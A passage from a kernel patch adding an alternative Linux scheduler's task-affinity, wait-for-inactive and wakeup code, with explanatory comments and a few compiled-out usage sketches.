++		 * Ok, time to look more closely! We need the rq
++		 * lock now, to be *sure*. If we're wrong, we'll
++		 * just go back and repeat.
++		 */
++		task_access_lock_irqsave(p, &lock, &flags);
++		trace_sched_wait_task(p);
++		running = task_on_cpu(p);
++		on_rq = p->on_rq;
++		ncsw = 0;
++		if (READ_ONCE(p->__state) & match_state)
++			ncsw = p->nvcsw | LONG_MIN; /* sets MSB */
++		task_access_unlock_irqrestore(p, lock, &flags);
++
++		/*
++		 * If it changed from the expected state, bail out now.
++		 */
++		if (unlikely(!ncsw))
++			break;
++
++		/*
++		 * Was it really running after all now that we
++		 * checked with the proper locks actually held?
++		 *
++		 * Oops. Go back and try again..
++		 */
++		if (unlikely(running)) {
++			cpu_relax();
++			continue;
++		}
++
++		/*
++		 * It's not enough that it's not actively running,
++		 * it must be off the runqueue _entirely_, and not
++		 * preempted!
++		 *
++		 * So if it was still runnable (but just not actively
++		 * running right now), it's preempted, and we should
++		 * yield - it could be a while.
++		 */
++		if (unlikely(on_rq)) {
++			ktime_t to = NSEC_PER_SEC / HZ;
++
++			set_current_state(TASK_UNINTERRUPTIBLE);
++			schedule_hrtimeout(&to, HRTIMER_MODE_REL_HARD);
++			continue;
++		}
++
++		/*
++		 * Ahh, all good. It wasn't running, and it wasn't
++		 * runnable, which means that it will never become
++		 * running in the future either. We're all done!
++		 */
++		break;
++	}
++
++	return ncsw;
++}
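++
++/*
++ * Illustrative sketch of the double-call pattern implied by the comment
++ * above (hypothetical, compiled-out helper): matching switch counts from
++ * two calls prove @p stayed unscheduled in between.
++ */
++#if 0
++static bool example_remained_unscheduled(struct task_struct *p)
++{
++	unsigned long ncsw = wait_task_inactive(p, TASK_UNINTERRUPTIBLE);
++
++	if (!ncsw)	/* state changed: @p may have woken up */
++		return false;
++	/* ... work while @p is presumed off its CPU ... */
++	return wait_task_inactive(p, TASK_UNINTERRUPTIBLE) == ncsw;
++}
++#endif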
++
++/***
++ * kick_process - kick a running thread to enter/exit the kernel
++ * @p: the to-be-kicked thread
++ *
++ * Cause a process which is running on another CPU to enter
++ * kernel-mode, without any delay. (to get signals handled.)
++ *
++ * NOTE: this function doesn't have to take the runqueue lock,
++ * because all it wants to ensure is that the remote task enters
++ * the kernel. If the IPI races and the task has been migrated
++ * to another CPU then no harm is done and the purpose has been
++ * achieved as well.
++ */
++void kick_process(struct task_struct *p)
++{
++	int cpu;
++
++	preempt_disable();
++	cpu = task_cpu(p);
++	if ((cpu != smp_processor_id()) && task_curr(p))
++		smp_send_reschedule(cpu);
++	preempt_enable();
++}
++EXPORT_SYMBOL_GPL(kick_process);
++
++/*
++ * ->cpus_ptr is protected by both rq->lock and p->pi_lock
++ *
++ * A few notes on cpu_active vs cpu_online:
++ *
++ *  - cpu_active must be a subset of cpu_online
++ *
++ *  - on CPU-up we allow per-CPU kthreads on the online && !active CPU,
++ *    see __set_cpus_allowed_ptr(). At this point the newly online
++ *    CPU isn't yet part of the sched domains, and balancing will not
++ *    see it.
++ *
++ *  - on cpu-down we clear cpu_active() to mask the sched domains and
++ *    prevent the load balancer from placing new tasks on the CPU being
++ *    removed. Existing tasks will remain running there and will be taken
++ *    off.
++ *
++ * This means that fallback selection must not select !active CPUs.
++ * And can assume that any active CPU must be online. Conversely
++ * select_task_rq() below may allow selection of !active CPUs in order
++ * to satisfy the above rules.
++ */
++static int select_fallback_rq(int cpu, struct task_struct *p)
++{
++	int nid = cpu_to_node(cpu);
++	const struct cpumask *nodemask = NULL;
++	enum { cpuset, possible, fail } state = cpuset;
++	int dest_cpu;
++
++	/*
++	 * If the node that the CPU is on has been offlined, cpu_to_node()
++	 * will return -1. There is no CPU on the node, and we should
++	 * select a CPU on another node.
++	 */
++	if (nid != -1) {
++		nodemask = cpumask_of_node(nid);
++
++		/* Look for allowed, online CPU in same node. */
++		for_each_cpu(dest_cpu, nodemask) {
++			if (is_cpu_allowed(p, dest_cpu))
++				return dest_cpu;
++		}
++	}
++
++	for (;;) {
++		/* Any allowed, online CPU? */
++		for_each_cpu(dest_cpu, p->cpus_ptr) {
++			if (!is_cpu_allowed(p, dest_cpu))
++				continue;
++			goto out;
++		}
++
++		/* No more Mr. Nice Guy. */
++		switch (state) {
++		case cpuset:
++			if (cpuset_cpus_allowed_fallback(p)) {
++				state = possible;
++				break;
++			}
++			fallthrough;
++		case possible:
++			/*
++			 * XXX When called from select_task_rq() we only
++			 * hold p->pi_lock and again violate locking order.
++			 *
++			 * More yuck to audit.
++			 */
++			do_set_cpus_allowed(p, task_cpu_possible_mask(p));
++			state = fail;
++			break;
++
++		case fail:
++			BUG();
++			break;
++		}
++	}
++
++out:
++	if (state != cpuset) {
++		/*
++		 * Don't tell them about moving exiting tasks or
++		 * kernel threads (both mm NULL), since they never
++		 * leave kernel.
++		 */
++		if (p->mm && printk_ratelimit()) {
++			printk_deferred("process %d (%s) no longer affine to cpu%d\n",
++					task_pid_nr(p), p->comm, cpu);
++		}
++	}
++
++	return dest_cpu;
++}
++
++static inline int select_task_rq(struct task_struct *p)
++{
++	cpumask_t chk_mask, tmp;
++
++	if (unlikely(!cpumask_and(&chk_mask, p->cpus_ptr, cpu_active_mask)))
++		return select_fallback_rq(task_cpu(p), p);
++
++	if (
++#ifdef CONFIG_SCHED_SMT
++	    cpumask_and(&tmp, &chk_mask, &sched_sg_idle_mask) ||
++#endif
++	    cpumask_and(&tmp, &chk_mask, sched_rq_watermark) ||
++	    cpumask_and(&tmp, &chk_mask,
++			sched_rq_watermark + SCHED_QUEUE_BITS - 1 - task_sched_prio(p)))
++		return best_mask_cpu(task_cpu(p), &tmp);
++
++	return best_mask_cpu(task_cpu(p), &chk_mask);
++}
++
++void sched_set_stop_task(int cpu, struct task_struct *stop)
++{
++	static struct lock_class_key stop_pi_lock;
++	struct sched_param stop_param = { .sched_priority = STOP_PRIO };
++	struct sched_param start_param = { .sched_priority = 0 };
++	struct task_struct *old_stop = cpu_rq(cpu)->stop;
++
++	if (stop) {
++		/*
++		 * Make it appear like a SCHED_FIFO task, it's something
++		 * userspace knows about and won't get confused by.
++		 *
++		 * Also, it will make PI more or less work without too
++		 * much confusion -- but then, stop work should not
++		 * rely on PI working anyway.
++		 */
++		sched_setscheduler_nocheck(stop, SCHED_FIFO, &stop_param);
++
++		/*
++		 * The PI code calls rt_mutex_setprio() with ->pi_lock held to
++		 * adjust the effective priority of a task. As a result,
++		 * rt_mutex_setprio() can trigger (RT) balancing operations,
++		 * which can then trigger wakeups of the stop thread to push
++		 * around the current task.
++		 *
++		 * The stop task itself will never be part of the PI-chain, it
++		 * never blocks, therefore that ->pi_lock recursion is safe.
++		 * Tell lockdep about this by placing the stop->pi_lock in its
++		 * own class.
++		 */
++		lockdep_set_class(&stop->pi_lock, &stop_pi_lock);
++	}
++
++	cpu_rq(cpu)->stop = stop;
++
++	if (old_stop) {
++		/*
++		 * Reset it back to a normal scheduling policy so that
++		 * it can die in pieces.
++		 */
++		sched_setscheduler_nocheck(old_stop, SCHED_NORMAL, &start_param);
++	}
++}
++
++static int affine_move_task(struct rq *rq, struct task_struct *p, int dest_cpu,
++			    raw_spinlock_t *lock, unsigned long irq_flags)
++{
++	/* Can the task run on the task's current CPU? If so, we're done */
++	if (!cpumask_test_cpu(task_cpu(p), &p->cpus_mask)) {
++		if (p->migration_disabled) {
++			if (likely(p->cpus_ptr != &p->cpus_mask))
++				__do_set_cpus_ptr(p, &p->cpus_mask);
++			p->migration_disabled = 0;
++			p->migration_flags |= MDF_FORCE_ENABLED;
++			/* When p is migrate_disabled, rq->lock should be held */
++			rq->nr_pinned--;
++		}
++
++		if (task_on_cpu(p) || READ_ONCE(p->__state) == TASK_WAKING) {
++			struct migration_arg arg = { p, dest_cpu };
++
++			/* Need help from migration thread: drop lock and wait. */
++			__task_access_unlock(p, lock);
++			raw_spin_unlock_irqrestore(&p->pi_lock, irq_flags);
++			stop_one_cpu(cpu_of(rq), migration_cpu_stop, &arg);
++			return 0;
++		}
++		if (task_on_rq_queued(p)) {
++			/*
++			 * OK, since we're going to drop the lock immediately
++			 * afterwards anyway.
++			 */
++			update_rq_clock(rq);
++			rq = move_queued_task(rq, p, dest_cpu);
++			lock = &rq->lock;
++		}
++	}
++	__task_access_unlock(p, lock);
++	raw_spin_unlock_irqrestore(&p->pi_lock, irq_flags);
++	return 0;
++}
++
++static int __set_cpus_allowed_ptr_locked(struct task_struct *p,
++					 const struct cpumask *new_mask,
++					 u32 flags,
++					 struct rq *rq,
++					 raw_spinlock_t *lock,
++					 unsigned long irq_flags)
++{
++	const struct cpumask *cpu_allowed_mask = task_cpu_possible_mask(p);
++	const struct cpumask *cpu_valid_mask = cpu_active_mask;
++	bool kthread = p->flags & PF_KTHREAD;
++	struct cpumask *user_mask = NULL;
++	int dest_cpu;
++	int ret = 0;
++
++	if (kthread || is_migration_disabled(p)) {
++		/*
++		 * Kernel threads are allowed on online && !active CPUs,
++		 * however, during cpu-hot-unplug, even these might get pushed
++		 * away if not KTHREAD_IS_PER_CPU.
++		 *
++		 * Specifically, migration_disabled() tasks must not fail the
++		 * cpumask_any_and() pick below, esp. so on
++		 * SCA_MIGRATE_ENABLE, otherwise we'll not call
++		 * set_cpus_allowed_common() and actually reset p->cpus_ptr.
++		 */
++		cpu_valid_mask = cpu_online_mask;
++	}
++
++	if (!kthread && !cpumask_subset(new_mask, cpu_allowed_mask)) {
++		ret = -EINVAL;
++		goto out;
++	}
++
++	/*
++	 * Must re-check here, to close a race against __kthread_bind(),
++	 * sched_setaffinity() is not guaranteed to observe the flag.
++	 */
++	if ((flags & SCA_CHECK) && (p->flags & PF_NO_SETAFFINITY)) {
++		ret = -EINVAL;
++		goto out;
++	}
++
++	if (cpumask_equal(&p->cpus_mask, new_mask))
++		goto out;
++
++	dest_cpu = cpumask_any_and(cpu_valid_mask, new_mask);
++	if (dest_cpu >= nr_cpu_ids) {
++		ret = -EINVAL;
++		goto out;
++	}
++
++	__do_set_cpus_allowed(p, new_mask);
++
++	if (flags & SCA_USER)
++		user_mask = clear_user_cpus_ptr(p);
++
++	ret = affine_move_task(rq, p, dest_cpu, lock, irq_flags);
++
++	kfree(user_mask);
++
++	return ret;
++
++out:
++	__task_access_unlock(p, lock);
++	raw_spin_unlock_irqrestore(&p->pi_lock, irq_flags);
++
++	return ret;
++}
++
++/*
++ * Change a given task's CPU affinity. Migrate the thread to a
++ * proper CPU and schedule it away if the CPU it's executing on
++ * is removed from the allowed bitmask.
++ *
++ * NOTE: the caller must have a valid reference to the task, the
++ * task must not exit() & deallocate itself prematurely. The
++ * call is not atomic; no spinlocks may be held.
++ */
++static int __set_cpus_allowed_ptr(struct task_struct *p,
++				  const struct cpumask *new_mask, u32 flags)
++{
++	unsigned long irq_flags;
++	struct rq *rq;
++	raw_spinlock_t *lock;
++
++	raw_spin_lock_irqsave(&p->pi_lock, irq_flags);
++	rq = __task_access_lock(p, &lock);
++
++	return __set_cpus_allowed_ptr_locked(p, new_mask, flags, rq, lock, irq_flags);
++}
++
++int set_cpus_allowed_ptr(struct task_struct *p, const struct cpumask *new_mask)
++{
++	return __set_cpus_allowed_ptr(p, new_mask, 0);
++}
++EXPORT_SYMBOL_GPL(set_cpus_allowed_ptr);
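++
++/*
++ * Illustrative sketch of the most common use of the exported helper above
++ * (hypothetical, compiled-out): pinning a freshly created kthread to one
++ * CPU, as many drivers do.
++ */
++#if 0
++static void example_pin_kthread(struct task_struct *kt, int cpu)
++{
++	WARN_ON_ONCE(set_cpus_allowed_ptr(kt, cpumask_of(cpu)));
++}
++#endif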
++
++/*
++ * Change a given task's CPU affinity to the intersection of its current
++ * affinity mask and @subset_mask, writing the resulting mask to @new_mask
++ * and pointing @p->user_cpus_ptr to a copy of the old mask.
++ * If the resulting mask is empty, leave the affinity unchanged and return
++ * -EINVAL.
++ */
++static int restrict_cpus_allowed_ptr(struct task_struct *p,
++				     struct cpumask *new_mask,
++				     const struct cpumask *subset_mask)
++{
++	struct cpumask *user_mask = NULL;
++	unsigned long irq_flags;
++	raw_spinlock_t *lock;
++	struct rq *rq;
++	int err;
++
++	if (!p->user_cpus_ptr) {
++		user_mask = kmalloc(cpumask_size(), GFP_KERNEL);
++		if (!user_mask)
++			return -ENOMEM;
++	}
++
++	raw_spin_lock_irqsave(&p->pi_lock, irq_flags);
++	rq = __task_access_lock(p, &lock);
++
++	if (!cpumask_and(new_mask, &p->cpus_mask, subset_mask)) {
++		err = -EINVAL;
++		goto err_unlock;
++	}
++
++	/*
++	 * We're about to butcher the task affinity, so keep track of what
++	 * the user asked for in case we're able to restore it later on.
++	 */
++	if (user_mask) {
++		cpumask_copy(user_mask, p->cpus_ptr);
++		p->user_cpus_ptr = user_mask;
++	}
++
++	return __set_cpus_allowed_ptr_locked(p, new_mask, 0, rq, lock, irq_flags);
++
++err_unlock:
++	__task_access_unlock(p, lock);
++	raw_spin_unlock_irqrestore(&p->pi_lock, irq_flags);
++	kfree(user_mask);
++	return err;
++}
++
++/*
++ * Restrict the CPU affinity of task @p so that it is a subset of
++ * task_cpu_possible_mask() and point @p->user_cpus_ptr to a copy of the
++ * old affinity mask. If the resulting mask is empty, we warn and walk
++ * up the cpuset hierarchy until we find a suitable mask.
++ */
++void force_compatible_cpus_allowed_ptr(struct task_struct *p)
++{
++	cpumask_var_t new_mask;
++	const struct cpumask *override_mask = task_cpu_possible_mask(p);
++
++	alloc_cpumask_var(&new_mask, GFP_KERNEL);
++
++	/*
++	 * __migrate_task() can fail silently in the face of concurrent
++	 * offlining of the chosen destination CPU, so take the hotplug
++	 * lock to ensure that the migration succeeds.
++	 */
++	cpus_read_lock();
++	if (!cpumask_available(new_mask))
++		goto out_set_mask;
++
++	if (!restrict_cpus_allowed_ptr(p, new_mask, override_mask))
++		goto out_free_mask;
++
++	/*
++	 * We failed to find a valid subset of the affinity mask for the
++	 * task, so override it based on its cpuset hierarchy.
++	 */
++	cpuset_cpus_allowed(p, new_mask);
++	override_mask = new_mask;
++
++out_set_mask:
++	if (printk_ratelimit()) {
++		printk_deferred("Overriding affinity for process %d (%s) to CPUs %*pbl\n",
++				task_pid_nr(p), p->comm,
++				cpumask_pr_args(override_mask));
++	}
++
++	WARN_ON(set_cpus_allowed_ptr(p, override_mask));
++out_free_mask:
++	cpus_read_unlock();
++	free_cpumask_var(new_mask);
++}
++
++static int
++__sched_setaffinity(struct task_struct *p, const struct cpumask *mask);
++
++/*
++ * Restore the affinity of a task @p which was previously restricted by a
++ * call to force_compatible_cpus_allowed_ptr(). This will clear (and free)
++ * @p->user_cpus_ptr.
++ *
++ * It is the caller's responsibility to serialise this with any calls to
++ * force_compatible_cpus_allowed_ptr(@p).
++ */
++void relax_compatible_cpus_allowed_ptr(struct task_struct *p)
++{
++	struct cpumask *user_mask = p->user_cpus_ptr;
++	unsigned long flags;
++
++	/*
++	 * Try to restore the old affinity mask. If this fails, then
++	 * we free the mask explicitly to avoid it being inherited across
++	 * a subsequent fork().
++	 */
++	if (!user_mask || !__sched_setaffinity(p, user_mask))
++		return;
++
++	raw_spin_lock_irqsave(&p->pi_lock, flags);
++	user_mask = clear_user_cpus_ptr(p);
++	raw_spin_unlock_irqrestore(&p->pi_lock, flags);
++
++	kfree(user_mask);
++}
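++
++/*
++ * Illustrative sketch of how the two helpers above pair up (hypothetical,
++ * compiled-out; in mainline the caller is the arch support for CPUs that
++ * can only execute certain tasks on a subset of cores):
++ */
++#if 0
++static void example_restricted_section(struct task_struct *p)
++{
++	/* Shrink affinity to task_cpu_possible_mask(), saving the old mask. */
++	force_compatible_cpus_allowed_ptr(p);
++	/* ... run while restricted ... */
++	/* Restore the saved mask and free p->user_cpus_ptr. */
++	relax_compatible_cpus_allowed_ptr(p);
++}
++#endif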
++
++#else /* CONFIG_SMP */
++
++static inline int select_task_rq(struct task_struct *p)
++{
++	return 0;
++}
++
++static inline int
++__set_cpus_allowed_ptr(struct task_struct *p,
++		       const struct cpumask *new_mask, u32 flags)
++{
++	return set_cpus_allowed_ptr(p, new_mask);
++}
++
++static inline bool rq_has_pinned_tasks(struct rq *rq)
++{
++	return false;
++}
++
++#endif /* !CONFIG_SMP */
++
++static void
++ttwu_stat(struct task_struct *p, int cpu, int wake_flags)
++{
++	struct rq *rq;
++
++	if (!schedstat_enabled())
++		return;
++
++	rq = this_rq();
++
++#ifdef CONFIG_SMP
++	if (cpu == rq->cpu) {
++		__schedstat_inc(rq->ttwu_local);
++		__schedstat_inc(p->stats.nr_wakeups_local);
++	} else {
++		/* Alt schedule FW ToDo:
++		 * How to do ttwu_wake_remote
++		 */
++	}
++#endif /* CONFIG_SMP */
++
++	__schedstat_inc(rq->ttwu_count);
++	__schedstat_inc(p->stats.nr_wakeups);
++}
++
++/*
++ * Mark the task runnable and perform wakeup-preemption.
++ */
++static inline void
++ttwu_do_wakeup(struct rq *rq, struct task_struct *p, int wake_flags)
++{
++	check_preempt_curr(rq);
++	WRITE_ONCE(p->__state, TASK_RUNNING);
++	trace_sched_wakeup(p);
++}
++
++static inline void
++ttwu_do_activate(struct rq *rq, struct task_struct *p, int wake_flags)
++{
++	if (p->sched_contributes_to_load)
++		rq->nr_uninterruptible--;
++
++	if (
++#ifdef CONFIG_SMP
++	    !(wake_flags & WF_MIGRATED) &&
++#endif
++	    p->in_iowait) {
++		delayacct_blkio_end(p);
++		atomic_dec(&task_rq(p)->nr_iowait);
++	}
++
++	activate_task(p, rq);
++	ttwu_do_wakeup(rq, p, 0);
++}
++
++/*
++ * Consider @p being inside a wait loop:
++ *
++ *   for (;;) {
++ *      set_current_state(TASK_UNINTERRUPTIBLE);
++ *
++ *      if (CONDITION)
++ *         break;
++ *
++ *      schedule();
++ *   }
++ *   __set_current_state(TASK_RUNNING);
++ *
++ * between set_current_state() and schedule(). In this case @p is still
++ * runnable, so all that needs doing is change p->state back to TASK_RUNNING in
++ * an atomic manner.
++ *
++ * By taking task_rq(p)->lock we serialize against schedule(), if @p->on_rq
++ * then schedule() must still happen and p->state can be changed to
++ * TASK_RUNNING. Otherwise we lost the race, schedule() has happened, and we
++ * need to do a full wakeup with enqueue.
++ *
++ * Returns: %true when the wakeup is done,
++ *          %false otherwise.
++ */
++static int ttwu_runnable(struct task_struct *p, int wake_flags)
++{
++	struct rq *rq;
++	raw_spinlock_t *lock;
++	int ret = 0;
++
++	rq = __task_access_lock(p, &lock);
++	if (task_on_rq_queued(p)) {
++		/* check_preempt_curr() may use rq clock */
++		update_rq_clock(rq);
++		ttwu_do_wakeup(rq, p, wake_flags);
++		ret = 1;
++	}
++	__task_access_unlock(p, lock);
++
++	return ret;
++}
++
++#ifdef CONFIG_SMP
++void sched_ttwu_pending(void *arg)
++{
++	struct llist_node *llist = arg;
++	struct rq *rq = this_rq();
++	struct task_struct *p, *t;
++	struct rq_flags rf;
++
++	if (!llist)
++		return;
++
++	/*
++	 * rq::ttwu_pending is a racy indication of outstanding wakeups.
++	 * It races such that false negatives are possible, since they
++	 * are shorter lived than false positives would be.
++	 */
++	WRITE_ONCE(rq->ttwu_pending, 0);
++
++	rq_lock_irqsave(rq, &rf);
++	update_rq_clock(rq);
++
++	llist_for_each_entry_safe(p, t, llist, wake_entry.llist) {
++		if (WARN_ON_ONCE(p->on_cpu))
++			smp_cond_load_acquire(&p->on_cpu, !VAL);
++
++		if (WARN_ON_ONCE(task_cpu(p) != cpu_of(rq)))
++			set_task_cpu(p, cpu_of(rq));
++
++		ttwu_do_activate(rq, p, p->sched_remote_wakeup ? WF_MIGRATED : 0);
++	}
++
++	rq_unlock_irqrestore(rq, &rf);
++}
++
++void send_call_function_single_ipi(int cpu)
++{
++	struct rq *rq = cpu_rq(cpu);
++
++	if (!set_nr_if_polling(rq->idle))
++		arch_send_call_function_single_ipi(cpu);
++	else
++		trace_sched_wake_idle_without_ipi(cpu);
++}
++
++/*
++ * Queue a task on the target CPUs wake_list and wake the CPU via IPI if
++ * necessary. The wakee CPU on receipt of the IPI will queue the task
++ * via sched_ttwu_pending() for activation so the wakee incurs the cost
++ * of the wakeup instead of the waker.
++ */
++static void __ttwu_queue_wakelist(struct task_struct *p, int cpu, int wake_flags)
++{
++	struct rq *rq = cpu_rq(cpu);
++
++	p->sched_remote_wakeup = !!(wake_flags & WF_MIGRATED);
++
++	WRITE_ONCE(rq->ttwu_pending, 1);
++	__smp_call_single_queue(cpu, &p->wake_entry.llist);
++}
++
++static inline bool ttwu_queue_cond(struct task_struct *p, int cpu)
++{
++	/*
++	 * Do not complicate things with the async wake_list while the CPU is
++	 * in hotplug state.
++	 */
++	if (!cpu_active(cpu))
++		return false;
++
++	/* Ensure the task will still be allowed to run on the CPU. */
++	if (!cpumask_test_cpu(cpu, p->cpus_ptr))
++		return false;
++
++	/*
++	 * If the CPU does not share cache, then queue the task on the
++	 * remote rqs wakelist to avoid accessing remote data.
++	 */
++	if (!cpus_share_cache(smp_processor_id(), cpu))
++		return true;
++
++	if (cpu == smp_processor_id())
++		return false;
++
++	/*
++	 * If the wakee cpu is idle, or the task is descheduling and the
++	 * only running task on the CPU, then use the wakelist to offload
++	 * the task activation to the idle (or soon-to-be-idle) CPU as
++	 * the current CPU is likely busy. nr_running is checked to
++	 * avoid unnecessary task stacking.
++	 *
++	 * Note that we can only get here with (wakee) p->on_rq=0,
++	 * p->on_cpu can be whatever, we've done the dequeue, so
++	 * the wakee has been accounted out of ->nr_running.
++	 */
++	if (!cpu_rq(cpu)->nr_running)
++		return true;
++
++	return false;
++}
++
++static bool ttwu_queue_wakelist(struct task_struct *p, int cpu, int wake_flags)
++{
++	if (__is_defined(ALT_SCHED_TTWU_QUEUE) && ttwu_queue_cond(p, cpu)) {
++		sched_clock_cpu(cpu); /* Sync clocks across CPUs */
++		__ttwu_queue_wakelist(p, cpu, wake_flags);
++		return true;
++	}
++
++	return false;
++}
++
++void wake_up_if_idle(int cpu)
++{
++	struct rq *rq = cpu_rq(cpu);
++	unsigned long flags;
++
++	rcu_read_lock();
++
++	if (!is_idle_task(rcu_dereference(rq->curr)))
++		goto out;
++
++	raw_spin_lock_irqsave(&rq->lock, flags);
++	if (is_idle_task(rq->curr))
++		resched_curr(rq);
++	/* Else CPU is not idle, do nothing here */
++	raw_spin_unlock_irqrestore(&rq->lock, flags);
++
++out:
++	rcu_read_unlock();
++}
++
++bool cpus_share_cache(int this_cpu, int that_cpu)
++{
++	if (this_cpu == that_cpu)
++		return true;
++
++	return per_cpu(sd_llc_id, this_cpu) == per_cpu(sd_llc_id, that_cpu);
++}
++#else /* !CONFIG_SMP */
++
++static inline bool ttwu_queue_wakelist(struct task_struct *p, int cpu, int wake_flags)
++{
++	return false;
++}
++
++#endif /* CONFIG_SMP */
++
++static inline void ttwu_queue(struct task_struct *p, int cpu, int wake_flags)
++{
++	struct rq *rq = cpu_rq(cpu);
++
++	if (ttwu_queue_wakelist(p, cpu, wake_flags))
++		return;
++
++	raw_spin_lock(&rq->lock);
++	update_rq_clock(rq);
++	ttwu_do_activate(rq, p, wake_flags);
++	raw_spin_unlock(&rq->lock);
++}
++
++/*
++ * Invoked from try_to_wake_up() to check whether the task can be woken up.
++ *
++ * The caller holds p::pi_lock if p != current or has preemption
++ * disabled when p == current.
++ *
++ * The rules of PREEMPT_RT saved_state:
++ *
++ *   The related locking code always holds p::pi_lock when updating
++ *   p::saved_state, which means the code is fully serialized in both cases.
++ *
++ *   The lock wait and lock wakeups happen via TASK_RTLOCK_WAIT. No other
++ *   bits are set. This makes it possible to distinguish all wakeup scenarios.
++ */
++static __always_inline
++bool ttwu_state_match(struct task_struct *p, unsigned int state, int *success)
++{
++	if (IS_ENABLED(CONFIG_DEBUG_PREEMPT)) {
++		WARN_ON_ONCE((state & TASK_RTLOCK_WAIT) &&
++			     state != TASK_RTLOCK_WAIT);
++	}
++
++	if (READ_ONCE(p->__state) & state) {
++		*success = 1;
++		return true;
++	}
++
++#ifdef CONFIG_PREEMPT_RT
++	/*
++	 * Saved state preserves the task state across blocking on
++	 * an RT lock.  If the state matches, set p::saved_state to
++	 * TASK_RUNNING, but do not wake the task because it waits
++	 * for a lock wakeup. Also indicate success because from
++	 * the regular waker's point of view this has succeeded.
++	 *
++	 * After acquiring the lock the task will restore p::__state
++	 * from p::saved_state which ensures that the regular
++	 * wakeup is not lost. The restore will also set
++	 * p::saved_state to TASK_RUNNING so any further tests will
++	 * not result in false positives vs. @success
++	 */
++	if (p->saved_state & state) {
++		p->saved_state = TASK_RUNNING;
++		*success = 1;
++	}
++#endif
++	return false;
++}
++
++/*
++ * Notes on Program-Order guarantees on SMP systems.
++ *
++ *  MIGRATION
++ *
++ * The basic program-order guarantee on SMP systems is that when a task [t]
++ * migrates, all its activity on its old CPU [c0] happens-before any subsequent
++ * execution on its new CPU [c1].
++ *
++ * For migration (of runnable tasks) this is provided by the following means:
++ *
++ *  A) UNLOCK of the rq(c0)->lock scheduling out task t
++ *  B) migration for t is required to synchronize *both* rq(c0)->lock and
++ *     rq(c1)->lock (if not at the same time, then in that order).
++ *  C) LOCK of the rq(c1)->lock scheduling in task
++ *
++ * Transitivity guarantees that B happens after A and C after B.
++ * Note: we only require RCpc transitivity.
++ * Note: the CPU doing B need not be c0 or c1
++ *
++ * Example:
++ *
++ *   CPU0            CPU1            CPU2
++ *
++ *   LOCK rq(0)->lock
++ *   sched-out X
++ *   sched-in Y
++ *   UNLOCK rq(0)->lock
++ *
++ *                                   LOCK rq(0)->lock // orders against CPU0
++ *                                   dequeue X
++ *                                   UNLOCK rq(0)->lock
++ *
++ *                                   LOCK rq(1)->lock
++ *                                   enqueue X
++ *                                   UNLOCK rq(1)->lock
++ *
++ *                   LOCK rq(1)->lock // orders against CPU2
++ *                   sched-out Z
++ *                   sched-in X
++ *                   UNLOCK rq(1)->lock
++ *
++ *
++ *  BLOCKING -- aka. SLEEP + WAKEUP
++ *
++ * For blocking we (obviously) need to provide the same guarantee as for
++ * migration. However the means are completely different as there is no lock
++ * chain to provide order. Instead we do:
++ *
++ *   1) smp_store_release(X->on_cpu, 0)   -- finish_task()
++ *   2) smp_cond_load_acquire(!X->on_cpu) -- try_to_wake_up()
++ *
++ * Example:
++ *
++ *   CPU0 (schedule)  CPU1 (try_to_wake_up) CPU2 (schedule)
++ *
++ *   LOCK rq(0)->lock LOCK X->pi_lock
++ *   dequeue X
++ *   sched-out X
++ *   smp_store_release(X->on_cpu, 0);
++ *
++ *                    smp_cond_load_acquire(&X->on_cpu, !VAL);
++ *                    X->state = WAKING
++ *                    set_task_cpu(X,2)
++ *
++ *                    LOCK rq(2)->lock
++ *                    enqueue X
++ *                    X->state = RUNNING
++ *                    UNLOCK rq(2)->lock
++ *
++ *                                          LOCK rq(2)->lock // orders against CPU1
++ *                                          sched-out Z
++ *                                          sched-in X
++ *                                          UNLOCK rq(2)->lock
++ *
++ *                    UNLOCK X->pi_lock
++ *   UNLOCK rq(0)->lock
++ *
++ *
++ * However; for wakeups there is a second guarantee we must provide, namely we
++ * must observe the state that led to our wakeup. That is, not only must our
++ * task observe its own prior state, it must also observe the stores prior to
++ * its wakeup.
++ *
++ * This means that any means of doing remote wakeups must order the CPU doing
++ * the wakeup against the CPU the task is going to end up running on. This,
++ * however, is already required for the regular Program-Order guarantee above,
++ * since the waking CPU is the one issuing the ACQUIRE (smp_cond_load_acquire).
++ *
++ */
++
++/**
++ * try_to_wake_up - wake up a thread
++ * @p: the thread to be awakened
++ * @state: the mask of task states that can be woken
++ * @wake_flags: wake modifier flags (WF_*)
++ *
++ * Conceptually does:
++ *
++ *   If (@state & @p->state) @p->state = TASK_RUNNING.
++ *
++ * If the task was not queued/runnable, also place it back on a runqueue.
++ *
++ * This function is atomic against schedule() which would dequeue the task.
++ *
++ * It issues a full memory barrier before accessing @p->state, see the comment
++ * with set_current_state().
++ *
++ * Uses p->pi_lock to serialize against concurrent wake-ups.
++ *
++ * Relies on p->pi_lock stabilizing:
++ *  - p->sched_class
++ *  - p->cpus_ptr
++ *  - p->sched_task_group
++ * in order to do migration, see its use of select_task_rq()/set_task_cpu().
++ *
++ * Tries really hard to only take one task_rq(p)->lock for performance.
++ * Takes rq->lock in:
++ *  - ttwu_runnable()    -- old rq, unavoidable, see comment there;
++ *  - ttwu_queue()       -- new rq, for enqueue of the task;
++ *  - psi_ttwu_dequeue() -- much sadness :-( accounting will kill us.
++ *
++ * As a consequence we race really badly with just about everything. See the
++ * many memory barriers and their comments for details.
++ *
++ * Return: %true if @p->state changes (an actual wakeup was done),
++ *	   %false otherwise.
++ */
++static int try_to_wake_up(struct task_struct *p, unsigned int state,
++			  int wake_flags)
++{
++	unsigned long flags;
++	int cpu, success = 0;
++
++	preempt_disable();
++	if (p == current) {
++		/*
++		 * We're waking current, this means 'p->on_rq' and 'task_cpu(p)
++		 * == smp_processor_id()'. Together this means we can special
++		 * case the whole 'p->on_rq && ttwu_runnable()' case below
++		 * without taking any locks.
++		 *
++		 * In particular:
++		 *  - we rely on Program-Order guarantees for all the ordering,
++		 *  - we're serialized against set_special_state() by virtue of
++		 *    it disabling IRQs (this allows not taking ->pi_lock).
++		 */
++		if (!ttwu_state_match(p, state, &success))
++			goto out;
++
++		trace_sched_waking(p);
++		WRITE_ONCE(p->__state, TASK_RUNNING);
++		trace_sched_wakeup(p);
++		goto out;
++	}
++
++	/*
++	 * If we are going to wake up a thread waiting for CONDITION we
++	 * need to ensure that CONDITION=1 done by the caller can not be
++	 * reordered with p->state check below. This pairs with smp_store_mb()
++	 * in set_current_state() that the waiting thread does.
++	 */
++	raw_spin_lock_irqsave(&p->pi_lock, flags);
++	smp_mb__after_spinlock();
++	if (!ttwu_state_match(p, state, &success))
++		goto unlock;
++
++	trace_sched_waking(p);
++
++	/*
++	 * Ensure we load p->on_rq _after_ p->state, otherwise it would
